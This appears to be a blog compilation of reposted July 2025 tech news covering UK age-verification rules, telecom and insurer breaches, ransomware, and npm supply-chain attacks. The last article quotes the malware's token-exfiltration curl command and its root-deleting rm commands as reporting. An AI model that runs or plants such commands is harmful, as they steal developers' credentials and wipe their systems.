Last Friday, the UK's Online Safety Act went into effect, requiring websites and social media platforms to prevent children from accessing "adult" content. Following the enactment of the law, VPN usage spiked in the UK.

The rapid increase in VPN demand was known to some extent in the immediate aftermath of the Online Safety Act going into effect. Proton VPN observed a 1400% hourly increase in sign-ups and Google searches for "Proton" increased 100-fold on July 25.

Now, thanks to figures from vpnMentor, we have more insight regarding VPN usage in the UK.

According the the researchers at vpnMentor, demand for VPN services in the UK increased steadily following the Online Safety Act going into effect. Demand peaked at 6,430% and remained at that level for nearly two hours.

While that demand decreased over the weekend, there were spikes between 900% and 4,000%.

Five different VPN providers are now among the 10 most downloaded apps through Apple's App Store. ProtonVPN sits in the number one spot with NordVPN, placing two of the best VPNs in the top 10. A few lesser-known services are also on the list.

Bypassing Online Safety Act

Age verification is the trending topic of the week. Last Friday, the UK's Online Safety Act went into effect, requiring websites to verify the age of anyone hoping to look at adult content.

While the law covers content most people would consider "adult," such as pornography, it also affects social media services and communication platforms.

Discord and Reddit are among the many sites that now require age verification if you're in the UK, though the former's system can be bypassed by using the photo mode in Death Stranding.

VPN usage is also on the rise. Proton VPN playfully suggested that the spike is not due to people trying to watch football. At one point, Proton VPN observed a 1400% hourly increase.

Xbox is also rolling out a system for users to verify their ages. Starting this week, Xbox users who have their age set to 18 or over in the UK need to sign in to their Xbox profiles and verify their age with an approved method.

Xbox relies on Yoti for age verification. Users can either take a photo for the system to estimate their age or scan a government-issued ID such as a passport, driver's license, or national ID.

• Age verification: https://aka.ms/XboxUKAgeVerification

You can also verify your age by entering your credit card details or by entering your mobile phone number and having your provider confirm you are an adult.

YouTube has revealed plans to bring its age detection technology to the United States. This is a machine learning algorithm which will infer a user's age based on various signals and traits such as the type of content they watch, the categories of their search queries, and the age of their account, among other things.

If an account is identified as belonging to a teen, YouTube will immediately stop personalized advertising for that account, turn on digital well-being tools, and stop the person from viewing repetitive content.

If this is a true positive detection, the user will just have to bear with the aforementioned consequences. However, in the case of a false positive, the affected person will be required to share their government-issued ID or credit card information.

Google will start rolling out this technology to a limited subset of customers in the U.S. in the coming weeks and then monitor its results. This is not its first rodeo in this field as it has already deployed and tested the model in other countries. Still, the company will closely monitor the outcome of the age detection tech and its accuracy.

YouTube has emphasized that it is committing to serving child-friendly content to minors and protect them from age-inappropriate material. It's unclear how accurate its age detection technology is, but we'll likely find out in the next few weeks. If this trial is successful, Google will probably roll it out to a larger audience in the U.S. and might expand to other countries too.

Source

Hope you enjoyed this news post.

Posted Wednesday 30 July 2025 at 12:04 pm AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

The compromised system was discovered and isolated from the rest of the network by Orange Cyberdefense, the company's cybersecurity business unit, on July 25. This has led to some operational disruptions, primarily affecting French customers, which are expected to be gradually resolved by Wednesday morning, July 30.

"On Friday, July 25, the Orange Group detected a cyberattack on one of its information systems. Immediately alerted, with the support of Orange Cyberdefense, the teams mobilized fully to isolate the potentially affected services and limit the impact," the telecom giant said.

"However, these isolation operations resulted in the disruption of certain services and management platforms for some of our business customers and for a few consumer services, mainly in France."

Since detecting this cyberattack, the company has alerted the relevant authorities and filed a complaint. Also, its investigation team has yet to find evidence that any data was stolen during the breach.

"At this stage of the investigation, there is no evidence to suggest that any customer or Orange data has been extracted. We remain vigilant in this regard," the company added.

While Orange has not attributed the cyberattack to a specific hacking group or threat actor, the incident bears resemblance to a series of widespread breaches of telecom providers in the United States and worldwide that have been linked to China's Salt Typhoon cyber-espionage group.

The FBI and CISA confirmed in October that the Chinese Salt Typhoon state hackers had breached multiple telecom providers (including AT&T, Verizon, Lumen, Charter Communications, Consolidated Communications, and Windstream), as well as other telecom companies in dozens of other countries.

Last month, Comcast and Digital Realty were also tagged as potentially compromised by Salt Typhoon, with satellite communications company Viasat revealing weeks later that it had also been breached as part of the same attacks.

In February, Orange's Romanian branch was hit by another cyberattack, with the company confirming the breach of a non-critical application after a threat actor using the alias 'Rey' claimed to have stolen thousands of internal documents containing employee data, user records, source code, invoices, contracts, and 380,000 email addresses.

Orange provides consumer communication services and business services to 294 million customers across Europe, Africa, and the Middle East, including 256 million mobile and 22 million fixed broadband customers. Orange also provides IT and telecommunications services to multinational companies under the brand Orange Business, has 125,800 employees worldwide, and reported revenues of €40.3 billion in 2024.

Source

Hope you enjoyed this news post.

Posted Wednesday 30 July 2025 at 4:05 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

The rise in email-delivered infostealers has made this a massive problem, with attackers finding new ways to snatch the session data that keeps you logged into services. This allows them to bypass even multi-factor authentication and casually walk right into your accounts.

The first enhancement is bringing passkey support to all Google Workspace customers. Google claims this offers benefits like ease of use and stronger security since passkeys are tied to a device and cannot be phished.

Passkey support is now generally available to more than 11 million Google Workspace customers, with expanded admin capabilities to audit enrollment and restrict passkeys to physical security keys.

Next, we have Device Bound Session Credentials (DBSC), now available in open beta, which protects you after you have already signed in. The way it works is: your browser generates a unique public and private key pair when you log in. The private key stays locked down on your machine, ideally in a hardware security chip, while the public key goes to the server. To keep the session alive, the server periodically sends a challenge that only the device with the private key can correctly answer.

If someone steals your session cookie, it is useless on their machine because they do not have that key. At the moment, this feature is only available on Chrome for Windows.

You might remember back in 2023 when tech YouTuber Linus Sebastian had his Linus Tech Tips (alongside the Techquickie sister channel) hacked. The way the attackers were able to gain access was through a malicious file disguised as a PDF in a sponsorship offer email.

After a staff member opened the file, it stole the channel's session tokens, giving the hackers full control to run cryptocurrency scams. DBSC is designed to make that kind of credential theft much harder.

And lastly, the company says that later this year, it will be introducing a shared signals framework (SSF) receiver. This basically means that different security services can talk to each other in a standardized way. If your identity provider detects a problem with your account, it can send a signal to Google to immediately terminate your session.

Source

Hope you enjoyed this news post.

Posted Wednesday 30 July 2025 at 4:04 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

People across the United Kingdom have been faced with a censored and partially inaccessible online landscape since the country introduced its latest digital safety rules on Friday.

The Online Safety Act mandates that web service operators must use “highly effective” age verification measures to stop kids from accessing a wide range of material, on penalty of heavy fines and criminal action against senior managers. It’s primarily focused on pornography and content that promotes suicide, self-harm, or eating disorders, but the scope of “priority content” also includes materials related to bullying, abusive or hateful content, and dangerous stunts or challenges.

Effectively, web platforms must either set up an age verification system that poses potential privacy risks, default to blocking huge swaths of potentially questionable content, or entirely pull out of the UK. Residents are finding themselves locked out of anything from period-related subreddits to hobbyist forums — it’s little wonder that they’re turning to VPNs.

Over the past several days, several large social media platforms have started requiring age verification in the UK to access certain features and types of content, in partnership with third-party software providers. Users typically have a choice between uploading bank card information, an image of government-issued ID, or a facial scan that estimates the user’s age.

Meta users likely won’t have seen a huge difference over the weekend, as Facebook and Instagram rolled out age verification requirements a few years ago. Bluesky users in the UK, however, now can’t access direct messaging capabilities until they complete the platform’s new age verification process. Reddit has also blocked access to specific subreddits for UK-based users who don’t complete its age verification process, some of which — r/periods, r/stopsmoking, r/stopdrinking, and r/sexualassault, for example — provide valued community support and resources for adults and minors alike.

People are already finding loopholes for these systems. The face scanning systems for Persona and k-ID — the third-party verification software used by Reddit and Discord, respectively — can both be easily tricked using Death Stranding’s photo mode. (Facebook and Instagram use a similar service called Yoti, which so far does not appear to have been fooled the same way.)

X doesn’t yet have a direct verification system, and is instead currently estimating age based on factors like account creation date, social connections, email addresses, and legacy verification. Accounts that don’t have any of these signals in place are locked out of accessing certain content until X rolls out the ID and facial scanner-based checkers it’s planning to release “in the following weeks.” That includes protest footage and video game clips that depict violence — and users who aren’t even based in the UK are reporting content restrictions as well.

Outside the biggest platforms, some sites are entirely inaccessible. Cybersecurity company McAfee reports that more than 6,000 websites that host adult content have already implemented age assurance methods, but others have opted to geoblock their services in the UK. A wide variety of unrelated, innocuous websites have followed suit. That includes forums for owners of EV Renault vehicles, electronic music production, beaded jewelry patterns, and tech-focused blogs. Many smaller forums simply don’t have the resources to support third-party verification systems or risk millions of dollars in fines.

Wikipedia has voiced similar concerns over other Online Safety Act rules that could require it to verify its adult contributors, which the Wikimedia Foundation behind Wikipedia says could leave volunteers vulnerable to “data breaches, stalking, lawsuits, or even imprisonment by authoritarian regimes.” As such, while it’s still available for now, the platform is also considering blocking UK users to avoid compliance entirely.

The UK’s communications regulator, Ofcom, declined to offer an attributed on-the-record comment about the new age checks to The Verge. In unattributed statements to other outlets, it said it was “now assessing compliance to make sure platforms have them in place, and companies that fall short should expect to face enforcement action.”

UK residents have launched a parliamentary petition in response to the sweeping age verification requirements, urging the UK government to repeal the Online Safety Act, and describing it as “far broader and restrictive than is necessary in a free society.” The petition has attracted more than 350,000 signatures at the time of writing, surpassing the 100,000 signatures needed to force the government to consider holding a debate over the demands.

Meanwhile, some users have been finding ways to avoid undergoing verification entirely, expressing distrust over handing their personal information over to private overseas companies. Many restrictions can be evaded by using a VPN, which masks the user’s true location by making it seem like they’re in another country — one without the UK’s rigid online safety rules. VPN apps are currently five out of the top 10 most popular free apps on Apple’s iOS store in the UK. The top spot is currently held by Swiss-based VPN provider Proton VPN, which surpassed ChatGPT over the weekend.

Proton VPN’s general manager, David Peterson, told The Verge that it had seen a more than 1,800 percent increase in daily sign-ups from UK-based users since Friday. The UK is now one of the countries generating the highest usage for Proton VPN, according to Peterson, with the vast majority of new users signing up for free accounts.

“This clearly shows that adults are concerned about the impact universal age verification laws will have on their privacy,” said Peterson. “The sign-up spike in the UK follows a similar pattern as when other governments put in place restrictions on communication or social media platforms, and shouldn’t be surprising since services like Wikipedia, Reddit, and X are reportedly being asked to comply with age verification requirements.”

Source

Hope you enjoyed this news post.

Posted Tuesday 29 July 2025 at 9:09 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

Microsoft is starting to comply with the UK’s Online Safety Act by prompting Xbox players to verify their age today. The prompts will be shown to Xbox players who indicate they’re over the age of 18 and will be shown when you sign into an Xbox account in the UK. Microsoft says it’s also exploring bringing similar age verification tools to other countries in the future.

To power the age verification in the UK, Microsoft is partnering with Yoti, which is one of the services that hasn’t fallen victim to the Death Stranding photo mode bypass. While the age verification checks are optional right now, they will become a requirement to access a variety of Xbox services in early 2026, when additional parts of the UK’s Online Safety Act come into force.

“Starting early next year, age verification will be required for these players in the UK to retain full access to social features on Xbox, such as voice or text communication and game invites,” explains Kim Kunes, vice president of gaming trust and safety at Xbox. If you don’t verify your age between now and early next year, social features “will become limited to friends only” until the age verification process has been completed.

“Whether a player verifies their age will not affect any previous purchases, entitlements, gameplay history, achievements, or the ability to play and purchase games, however we encourage players to verify their age via this one-time process now to avoid uninterrupted use of social features on Xbox in the future,” Kunes says.

While this is limited to Xbox players in the UK right now, Kunes says, “We expect to roll out age verification processes to more regions in the future.” Microsoft isn’t revealing which other regions will get similar age verification requirements, but Kunes does note that “these methods may look different across regions and experiences.”

If you’re in the UK, then you can verify your age for your Xbox account online through Microsoft, where you can use a selfie, a scan of your passport or driver’s license, a credit card check, or a mobile number.

Source

Hope you enjoyed this news post.

Posted Tuesday 29 July 2025 at 9:08 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

Viewing adult content now requires age verification within the United Kingdom. The UK's Online Safety Act went into effect late last week, causing many to see prompts to scan their own face or scan an ID.

Several popular websites began preparing for the age verification requirement earlier this month, including Reddit. But with the Online Safety Act enacted and being enforced, the biggest adult websites now require verification.

It appears some people did not want to pick either of those options to view adult content. Various workarounds have been discovered, including using a VPN.

But one particular bypass drew attention: you can use a video game to trick the security scan.

X user Dany Sterkhov shared that you can use the photo mode of Death Stranding to bypass the security check on Discord.

The fact that a still image displayed on a computer screen can trick the first step of the verification process does not speak highly of the check's robustness. But I suppose Discord deserves some credit for requiring a pose in a different position to get fully verified.

The k-ID system within Discord will ask you for a photo with your mouth open to confirm that you're real. You can meet that requirement by snapping a picture of Sam Porter Bridges, the protagonist of Death Stranding, within the game's photo mode.

Right now, the app is an initial, prototype version and isn’t ready for production use. Additionally, its current release still lacks full security features such as code obfuscation and anti-tampering measures.

While a homegrown app for age verification could theoretically have significant advantages over trusting sensitive information to third-party age assurance companies, plans for this app have caused some commotion online.

Plans for this app include using the Google Play Integrity API for device and app verification. The API checks to see whether the OS is licensed by Google and if the app was downloaded from the Play Store. This means that if you try to use an app on a non-Google-licensed Android system or try to download an app from outside the Play Store, it won’t work.

This feature is not yet implemented, but it is planned. If this plan does go ahead, it could limit user freedom and it also flies in the face of the EU’s antitrust actions against Google.

Numerous users and developers have already raised their concerns on GitHub about the planned Google Play Integrity integrations. Critics argue that such a measure would create dependency on American tech giants and undermine EU digital sovereignty.

People responding to the proposal in a GitHub issue referred the developers to existing identity apps such as Yivi, a Dutch age-verification app that functions without the Google Play Integrity API and is available on open-source app stores such as F-Droid.

At the time of writing, the issue remains open and a thread on Reddit has attracted attention to it. However, the maintainers of the project have not yet responded to the concerns.

Image via Depositphotos.com

Source

Hope you enjoyed this news post.

Posted Monday 28 July 2025 at 12:36 pm AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

All of this happened because people were not happy that Microsoft would record everything that they do on their PC and then share that information with an AI model, despite the company's assurances that all of this would happen locally and no data would be sent to Redmond's servers. Couple that with some lackluster security features and it was just a disaster waiting to happen.

Although things have improved quite a bit since then, thanks to extensive testing in Insider Channels, some third-parties are still giving users controls that will allow them to block Recall for the vendor's software. I personally believe that this is a good thing, and we definitely should have more scrutiny around software that captures our activities (even with our consent). But as we approach Windows 10's 10th birthday and eventual end of support date, I can't help but realize that the main reason behind Windows customers being very privacy conscious nowadays is the beloved Windows 10 operating system itself.

Windows 10 and the telemetry fiasco

To truly understand what I mean, we have to go back a decade, to the launch of Windows 10 in 2015. Although the operating system has an ardent fanbase now, things weren't always this way. In fact, Windows 10 had a fairly rocky launch, and one of the reasons behind this was dreaded word telemetry.

Anyone who has spent some time in the field of software development and productionizing solutions knows that telemetry typically the anonymized collection of data from various signals to monitor the health of software and diagnose a problem in case of any issues. Telemetry is very useful, for example, in cases where your Microsoft Word application may unexpectedly crash. Microsoft would monitor the telemetry logs from this crash, diagnose the problem, and ideally deliver a fix so that it doesn't happen on your or anyone else's device again.

Now, telemetry collection is a regular process, all major software vendors have it at some level. However, when Microsoft decided to mention it in their privacy statement for Windows 10's Technical Preview (this is what Windows Insider Previews were called at that time) in 2014, there was massive uproar. Things spiraled to the point that people began to allege that Microsoft is spying on literally everything that you do through Windows 10.

The backlash was so significant that by April 2015, a few months prior to the launch of Windows 10, Microsoft was scrambling to add new privacy controls in the operating system in response and the ability to delete content that Cortana (R.I.P) remembered about you. Heck, we even had software pirates and torrent-sharing groups banning Windows 10 over privacy concerns. Even Russian law firms began applying pressure on Moscow to investigate Microsoft over Windows 10's alleged spying. By 2017, Microsoft was under scrutiny from Switzerland, France, and other European authorities because of these claims.

During this tumultuous period, the Redmond tech firm was constantly putting out statements to convince people that Windows 10 does not spy on you, all while building a dedicated privacy dashboard for the operating system and fixing actual Windows 10 privacy bugs. It was clear that Windows 10's launch hadn't been as smooth as the company probably would have wanted.

Turning the privacy corner

Things finally started to go in Microsoft's favor in April 2017, roughly two whole years after the launch of Windows 10. This was primarily because of the firm's increased transparency regarding data collection, enhanced privacy controls, and useful privacy reminders when installing new versions of Windows 10. By August 2017, Microsoft put out a statement saying that it is seeing "positive reception" from customers regarding privacy, indicating that it had finally turned a corner on the specific topic.

This did not mean that Microsoft had been completely absolved by the public and regulators. It was still the target of regular regulator scrutiny, despite releasing new privacy controls frequently and constantly assuring customers that their data is not being sent to Microsoft without their consent. But it was clear that the worst was now behind.

Where we stand now

I would argue that the entire privacy and telemetry fiasco surrounding Windows 10 was blown out of proportion. I will emphasize again: telemetry collection is a regular process in software development and productionization, and it's something that every big firm does. However, a target was put on Microsoft's back just because it was a hot topic to spread fear, uncertainty, and doubt (FUD).

As a Windows 10 veteran who has been around since the earliest days of the operating system's Technical Previews, I'm glad that we still managed to extract something positive out of this experience. Microsoft became very conscious about privacy (until Windows 11 Recall, that is), while we as customers began to understand that our data matters to us. Just because Windows 10 was not spying on us didn't mean that no one else is either. Media outlets like Neowin also became conscious of the topic, which is the main reason why we were able to avoid the disastrous initial launch of Windows 11 Recall.

Despite how all of this started, all the FUD, I'm at least glad about where we ended. Although Windows 10 is adored by Microsoft customers even now, things weren't always like this. And as we celebrate the 10th birthday of the OS and its imminent device, it's important to be mindful of the fact that this is the operating system that made us so conscious about software privacy, and that's a good thing.

This story is a part of our "10 Years of Windows 10" collection, in celebration of the operating system's tenth anniversary, falling on July 29, 2025. Over the next few days and weeks, you'll be able to find more content on this topic in our dedicated section available here.

Source

Hope you enjoyed this news post.

Posted Sunday 27 July 2025 at 1:17 pm AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

"On July 16, 2025, a malicious threat actor gained access to a third-party, cloud-based CRM system used by Allianz Life Insurance Company of North America (Allianz Life)," an Allianz Life spokesperson told BleepingComputer.

"The threat actor was able to obtain personally identifiable data related to the majority of Allianz Life's customers, financial professionals, and select Allianz Life employees, using a social engineering technique."

"We took immediate action to contain and mitigate the issue and notified the FBI. Based on our investigation to-date, there is no evidence the Allianz Life network or other company systems were accessed, including our policy administration system."

"Our investigation is ongoing and we began the process of reaching out to individuals impacted with dedicated resources to assist them. This incident is related only to Allianz Life, which currently has 1.4 million customers."

Allianz Life is a US-based provider of annuities and life insurance for over 1.4 million Americans. The company is owned by Allianz SE, a global financial services group headquartered in Germany, serving more than 128 million customers.

The company first revealed the breach in a mandatory filing with Maine's Attorney General's Office on Saturday, issuing a placeholder notification alerting of the breach.

"The consumer notice will be provided once Allianz has identified the affected individuals," reads the placeholder notification.

While Allianz Life declined to answer questions about the threat actor and whether they were being extorted, BleepingComputer has learned that the attack is believed to have been conducted by the ShinyHunters extortion group.

ShinyHunters is a group of threat actors who are linked to multiple high-profile data breaches and attacks, including those against PowerSchool and the SnowFlake attacks, which impacted Santander, Ticketmaster, AT&T, Advance Auto Parts, Neiman Marcus, and Cylance.

While multiple ShinyHunters members have been arrested over the past few years, including a recent arrest in France, the hacking group continues to conduct attacks.

Last month, Mandiant warned that ShinyHunters had begun to target Salesforce CRM customers in social engineering attacks.

During these attacks, the hackers impersonate IT support personnel, requesting the targeted employee accept a connection to Salesforce Data Loader, a client application that allows users to import, export, update, or delete data within Salesforce environments.

Once the connection is accepted, the threat actors use Salesforce Data Loader to exfiltrate data from Salesforce, which is then used to extort the company.

BleepingComputer asked Allianz Life if the CRM is Salesforce, but the spokesperson declined to comment.

Source

Hope you enjoyed this news post.

Posted Sunday 27 July 2025 at 1:15 pm AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

Post SMTP is a popular email delivery plugin for WordPress that counts more than 400,000 active installations. It’s marketed as a replacement of the default ‘wp_mail()’ function that is more reliable and feature-rich.

On May 23, a security researcher reported the vulnerability to WordPress security firm PatchStack. The flaw is now identified as CVE-2025-24000 and received a medium severity score of 8.8.

The security issue affects all versions of Post SMTP up to 3.2.0 and is due to a broken access control mechanism in the plugin’s REST API endpoints, which only verified if a user was logged in, without checking their permission level.

This means that low-privileged users, such as Subscribers, could access email logs containing full email content.

On vulnerable sites, a subscriber could initiate a password reset for an Administrator account, intercept the reset email via the logs, and gain control of the account.

The plugin’s developer, Saad Iqbal, was informed about the flaw and responded with a fix for Patchstack to review on May 26.

The solution was to incorporate additional privilege checks in the ‘get_logs_permission’ function that would validate a user’s permissions before giving access to sensitive API calls.

The fix was incorporated into Post SMTP version 3.3.0, which was published on June 11.

Download statistics on WordPress.org show that less than half of the plugin's user base (48.5%) has updated to version 3.3. This means that more than 200,000 websites are vulnerable to CVE-2025-24000.

A notable 24.2%, corresponding to 96,800 sites, still run Post SMTP versions from the 2.x branch, which is vulnerable to additional security flaws, leaving them open to attacks.

Source

Hope you enjoyed this news post.

Posted Sunday 27 July 2025 at 1:14 pm AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

Hot on the heels of a major ransomware group being taken down through an international law enforcement operation comes a new development that highlights the whack-a-mole nature of such actions: A new group, likely comprised of some of the same members, has already taken its place.

The new group calls itself Chaos, in recognition of the .chaos name extension its ransomware stamps on files it has encrypted and the “readme.chaos[.]txt” name given to ransom notes sent to victims. Researchers at Cisco’s Talos Security Group said Thursday that since Chaos emerged in February, it has engaged in “big-game hunting”—meaning attacks designed to extract hefty payments—that have mainly targeted organizations in the US and, to a lesser extent, the UK, New Zealand, and India. Talos said it recently observed the group demanding a ransom of about $300,000.

Walking in your footsteps

In exchange for paying the demanded ransom, victims get a pinky swear that they’ll receive a decryptor and a detailed report of the vulnerabilities the group members found in the victim’s network and that the group will delete all the data in its possession. Victims who refuse to pay face the threat of never getting their data unlocked, having data publicly disclosed, and being subjected to distributed denial-of-service attacks.

Cisco’s report came within hours of an international law enforcement action dubbed Operation CheckMate taking down the name-and-shame dark web site belonging to BlackSuit, a ransomware gang that, according to the US Cybersecurity and Infrastructure Security Agency, has demanded more than $500 million in payments in its short history.

Talos said Chaos is likely either a rebranding of the BlackSuit ransomware or is operated by some of the former BlackSuit members. Talos based its assessment on the similarities in the encryption mechanisms in the ransomware, the theme and structure of the ransom notes, the remote monitoring and management tools used to access targeted networks, and its choice of LOLbins—meaning executable files natively found in Windows environments—to compromise targets. LOLbins get their name because they’re binaries that allow the attackers to live off the land.

The Talos post was published around the same time that the dark web site belonging to BlackSuit began displaying a message saying the site had been seized in Operation CheckMate. Organizations that participated in the takedown included the US Department of Justice, the US Department of Homeland Security, the US Secret Service, the Dutch National Police, the German State Criminal Police Office, the UK National Crime Agency, the Frankfurt General Prosecutor's Office, the Justice Department, the Ukrainian Cyber Police, and Europol.

Screenshot

Chaos typically gains initial access through social engineering using email or voice phishing techniques. Eventually, the victim is persuaded to contact an IT security representative, who, in fact, is part of the ransomware operation. The Chaos member instructs the target to launch Microsoft Quick Assist, a remote-assistance tool built into Windows, and connect to the attacker’s endpoint.

Chaos' predecessor, BlackSuit, is a rebranding of an earlier ransomware operation known as Royal. Royal, according to Trend Micro, is a splinter group of the Conti ransomware group. The circle of ransomware groups continues.

Source

Hope you enjoyed this news post.

Posted Saturday 26 July 2025 at 1:06 pm AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

One week after Delta announced it is expanding a test using artificial intelligence to charge different prices based on customers' personal data—which critics fear could end cheap flights forever—Democratic lawmakers have moved to ban what they consider predatory surveillance pricing.

In a press release, Reps. Greg Casar (D-Texas) and Rashida Tlaib (D-Mich.) announced the Stop AI Price Gouging and Wage Fixing Act. The law directly bans companies from using "surveillance-based" price or wage setting to increase their profit margins.

If passed, the law would allow anyone to sue companies found unfairly using AI, lawmakers explained in what's called a "one-sheet." That could mean charging customers higher prices—based on "how desperate a customer is for a product and the maximum amount a customer is willing to pay"—or paying employees lower wages—based on "their financial status, personal associations, and demographics."

Tlaib called companies using AI to "exploit" workers in "desperate" situations "appalling," with the one-sheet specifically shaming delivery services that lower drivers' wages based on their "pattern of taking orders" and health care companies that base nurses' pay on "an algorithmically-manipulated-bidding war, not the tasks they perform."

The lawmakers also called out Delta among companies whose AI pricing plans, advocacy groups warn, stand to worsen the US "affordability crisis" that currently sees many Americans struggling to afford basic items, like groceries. Delta has confirmed it plans to "set 20 percent of prices using AI by the end of the year," lawmakers noted.

Asked for comment on the bill, a Delta spokesperson confirmed the airline will be reaching out to Senators to explain its AI pricing. In a statement, Delta denied that its AI system used personalized data for individualized pricing. Instead, it apparently relies on AI to forecast demand for certain flights, adapt to emerging market conditions (like jet fuel costs), and factor in a wide variety of undisclosed variables, in addition to learning from pricing decisions. However, factors like customer purchasing behavior, customer demand, and competitive offers that perhaps that customer is known to be weighing also influence the AI's pricing, which lawmakers and critics may be interpreting as individualized pricing.

"There is no fare product Delta has ever used, is testing or plans to use that targets customers with individualized offers based on personal information or otherwise," Delta said. "A variety of market forces drive the dynamic pricing model that’s been used in the global industry for decades, with new tech simply streamlining this process. Delta always complies with regulations around pricing and disclosures."

Other companies "engaging in surveillance-based price setting" include giants like Amazon and Kroger, as well as a ride-sharing app that has been "charging a customer more when their phone battery is low."

Public Citizen, a progressive consumer rights group that endorsed the bill, condemned the practice in the press release, urging Congress to pass the law and draw "a clear line in the sand: companies can offer discounts and fair wages—but not by spying on people."

"Surveillance-based price gouging and wage setting are exploitative practices that deepen inequality and strip consumers and workers of dignity," Public Citizen said.

AI pricing will cause “full-blown crisis”

In January, the Federal Trade Commission requested information from eight companies—including MasterCard, Revionics, Bloomreach, JPMorgan Chase, Task Software, PROS, Accenture, and McKinsey & Co—joining a "shadowy market" that provides AI pricing services. Those companies confirmed they've provided services to at least 250 companies "that sell goods or services ranging from grocery stores to apparel retailers," lawmakers noted.

That inquiry led the FTC to conclude that "widespread adoption of this practice may fundamentally upend how consumers buy products and how companies compete."

In the press release, the anti-monopoly watchdog, the American Economic Liberties Project, was counted among advocacy groups endorsing the Democrats' bill. Their senior legal counsel, Lee Hepner, pointed out that "grocery prices have risen 26 percent since the pandemic-era explosion of online shopping," and that's "dovetailing with new technology designed to squeeze every last penny from consumers."

Hepner pushed lawmakers to support the legislation banning AI surveillance pricing, suggesting that could help "restore fair, transparent, and predictable pricing." Otherwise, "there is no such thing as a good deal when every consumer is charged a different price," Hepner warned.

For consumers and workers who may not even realize they've been subjected to AI spying, the law offers paths through their state, the FTC, and the Equal Employment Opportunity Commission to sue. Any violations could force companies to either pay back the difference in any unfair transactions that AI systems recommended or $3,000—whichever is higher. And willful violations could triple damages owed.

"Giant corporations should not be allowed to jack up your prices or lower your wages using data they got spying on you," Casar said. "Whether you know it or not, you may already be getting ripped off by corporations using your personal data to charge you more. This problem is only going to get worse, and Congress should act before this becomes a full-blown crisis."

It's unclear if the Democrats can win enough support from Republicans to pass the bill. Perhaps notably, Republican FTC commissioners voted against releasing the report outlining potential concerns with AI surveillance pricing and wage setting.

In their dissent, commissioners Andrew Ferguson and Melissa Holyoak suggested the report was published prematurely, criticizing Biden's outgoing FTC for "nakedly" politicizing the agency and taking an "unprecedented" step in sharing preliminary summaries of findings.

However, they did agree that when the final report is ready, the "American public and Congress will surely value what the Commission ultimately learns and shares as to whether and how consumers’ private data may be used to affect their pocketbooks, especially as the future of our nation’s privacy laws is being considered."

Source

Hope you enjoyed this news post.

Posted Saturday 26 July 2025 at 1:05 pm AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

It has been a busy week for supply-chain attacks targeting open source software available in public repositories, with successful breaches of multiple developer accounts that resulted in malicious packages being pushed to unsuspecting users.

The latest target, according to security firm Socket, is JavaScript code available on repository npm. A total of 10 packages available from the npm page belonging to global talent agency Toptal contained malware and were downloaded by roughly 5,000 users before the supply-chain attack was detected. The packages have since been removed. This was the third supply-chain attack Socket has observed on npm in the past week.

Poisoning the well

The hackers behind the attack pulled it off by first compromising Toptal’s GitHub Organization and from there using that access to publish the malicious packages on npm.

Researchers still don’t know precisely how the attack worked and what the precise relationship was between the GitHub repository changes and the publishing of the packages on npm. Socket said in an email that the npm publishing “likely happed through GitHub Actions or stored npm tokens, which were accessible once the GitHub Organization was breached.” GitHub and npm are often linked in workflows, allowing the publishing of npm packages once a GitHub organization is hijacked.

“The attack could have originated from compromised GitHub access that enabled both repository modifications and npm publishing, or from separate compromise vectors that affected both platforms independently,” Socket researchers wrote Wednesday. “Without additional forensic evidence, determining the precise sequence and relationship between these events remains challenging.”

Toptal has yet to say how its account was compromised. Company representatives didn’t respond to an email asking.

The malicious payload inserted into the packages had two stages. First, the code extracted the target's GitHub authentication token and sent it to an attacker-controlled endpoint at the domain webhook.site. These tokens gave the attackers persistent access to the target’s GitHub repositories, which could in turn be used in further supply-chain attacks.

The command invoking the extraction was:

curl -d "$(gh auth token)" https://webhook[.]site/fb5b4647-aff8-418c-99e7-ec830cc2024b

After the credentials were exfiltrated, the payload tried to delete the entire filesystem of the target’s device. The script contained commands for destroying file systems on either Unix-like or Windows operating systems. The Unix command used was:

sudo rm -rf --no-preserve-root /

The --no-preserve-root flag is specifically designed to override safety protections that would normally prevent deletion of the root directory.

The postinstall script that includes a Windows-equivalent destructive command was:

rm /s /q

Socket published a separate report Wednesday on yet more supply-chain attacks, one targeting npm users and another targeting users of PyPI. As of Wednesday, the four malicious packages—three published to npm and the fourth on PyPI—collectively had been downloaded more than 56,000 times. Socket said it was working to get them removed.

When installed, the packages “covertly integrate surveillance functionality into the developer’s environment, enabling keylogging, screen capture, fingerprinting, webcam access, and credential theft,” Socket researchers wrote. They added that the malware monitored and captured user activity and transmitted it to attacker-controlled infrastructure. Socket used the term surveillance malware to emphasize the covert observation and data exfiltration tactics “in the context of malicious dependencies.”

Last Friday, Socket reported the third attack. This one compromised an account on npm and used the access to plant malicious code inside three packages available on the site. The compromise occurred after the attackers successfully obtained a credential token that the developer used to authenticate to the site.

The attackers obtained the credential through a targeted phishing attack Socket had disclosed hours earlier. The email instructed the recipient to log in through a URL on npnjs.com. The site is a typosquatting spoof of the official npmjs.com domain. To make the attack more convincing, the phishing URL contained a token field that mimicked tokens npm uses for authentication. The phishing URL was in the format of https://npnjs.com/login?token=xxxxxx where the xxxxxx represented the token.

A phishing email targeting npm account holders.

